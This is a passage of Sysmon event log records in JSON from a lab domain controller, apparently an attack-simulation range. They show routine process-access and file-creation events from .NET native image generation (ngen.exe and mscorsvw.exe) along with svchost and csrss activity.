C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.915","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-001048090C00}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6427,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.978\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010780C0C00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.978","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010780C0C00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6428,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.978\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010780C0C00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.978","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010780C0C00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6429,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:20.993\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010780C0C00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:20.993","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010780C0C00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6430,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:57:22.400\r\nProcessGuid: {A837DB8D-0440-5F25-0000-0010780C0C00}\r\nProcessId: 4660\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1234-0\\System.Xaml.dll\r\nCreationUtcTime: 2020-08-01 05:57:22.400","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:57:22.400","ProcessGuid":"{A837DB8D-0440-5F25-0000-0010780C0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1234-0\\System.Xaml.dll","CreationUtcTime":"2020-08-01 05:57:22.400","EventReceivedTime":"2020-08-01 05:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6431,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:22.462\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0442-5F25-0000-00106B100C00}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:22.462","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0442-5F25-0000-00106B100C00}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6432,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:22.462\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0442-5F25-0000-00106B100C00}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:22.462","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0442-5F25-0000-00106B100C00}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6433,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:22.462\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0442-5F25-0000-00106B100C00}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:22.462","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0442-5F25-0000-00106B100C00}","TargetProcessId":"4576","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:22","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6434,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:22.603\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0442-5F25-0000-001014140C00}\r\nTargetProcessId: 4972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:22.603","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0442-5F25-0000-001014140C00}","TargetProcessId":"4972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
